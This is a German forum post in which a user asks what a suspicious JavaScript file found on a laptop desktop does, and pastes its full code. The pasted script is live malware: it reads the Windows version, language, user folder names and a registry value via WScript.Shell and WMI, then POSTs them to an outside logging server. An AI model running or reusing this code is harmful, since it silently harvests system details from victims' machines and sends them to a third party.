JS auf dem Deskotp

[Ahnungsloser_User]

Hallo, bin neu hier. Seit mehr als 24h versuche ich einen Laptop bischen flotter zu machen und zu entschlacken.

Nun habe ich auf dem Deskop eine JS-Datei entdeckt, welches heute um ca. 2:00 erstellt worden ist.

Habe bis auf Windows-Update nichts installiert.

Kann mir vielleicht jemand sagen, was dieser Script anstellt (und evtl. woher da das Ding kommen mag)

Hier der Inhalt der Datei per Copy&Paste

var chr=String.fromCharCode;var slash=chr(92);var backslash=chr(47);var quote=chr(34);var s = get_localization_string();var x = new ActiveXObject('Microsoft.XMLHTTP');x.open('POST', 'http://locale.ipq.co/locale_logger3.php', false);x.send(s);function get_localization_string(){var param_delim = chr(34)+chr(44)+chr(34);var wsh = new ActiveXObject('WScript.Shell'); my_computer = wsh.RegRead('HKCR'+slash+'CLSID'+slash+'{20D04FE0-3AEA-1069-A2D8-08002B30309D}'+slash);sf=wsh['SpecialFolders'];desktop_path = sf('Desktop');app_data_path = sf('AppData');my_documents_path = sf('MyDocuments');startup_path = slash2backslash(sf('StartUp'));info=get_windows_info(); version=info.version;os_lang=dechex(info.lang);var num_backslashes = substr_count(startup_path, backslash);var tmp = startup_path;for(var i=0; i < num_backslashes - 2; i++) tmp = tmp.substr(tmp.indexOf(backslash) + 1);if(tmp == '') tmp = startup_path;return version + ' / lang: ' + os_lang + chr(9) + quote + get_folder_name(desktop_path) + param_delim + get_folder_name(my_documents_path) + param_delim + my_computer + param_delim + get_folder_name(app_data_path) + param_delim + tmp + quote}function get_folder_name(path){s1 = path;path = slash2backslash(path); s = path.substr(path.lastIndexOf(backslash) + 1);return (s == '') ? s1 : s;}function slash2backslash(s){return s.replace(new RegExp(slash+slash, chr(103)), backslash)}function substr_count (haystack, needle, offset, length){var pos = 0,cnt = 0;haystack += '';needle += '';if (isNaN(offset)) {offset = 0;}if (isNaN(length)) {length = 0;}offset--;while ((offset = haystack.indexOf(needle, offset + 1)) != -1) {if (length > 0 && (offset + needle.length) > length) {return false;} else {cnt++;}}return cnt;}function get_windows_info(){s = {};try {var o = GetObject("winmgmts:\\\\.\\root\\cimv2");var e = new Enumerator(o.ExecQuery('SELECT * FROM Win32_OperatingSystem'));var i = e.item();s.version = i.Caption + ' ' + i.Version; s.lang=i.OSLanguage;} catch(ex){} return s}function dechex(number){if (number < 0) {number = 0xFFFFFFFF + number + 1}return parseInt(number, 10).toString(16)}

"----------

Übrigens, der Internet-Explorer startet und sofort wieder beendet.
Vielleicht hat diese Script damit was zu tun?!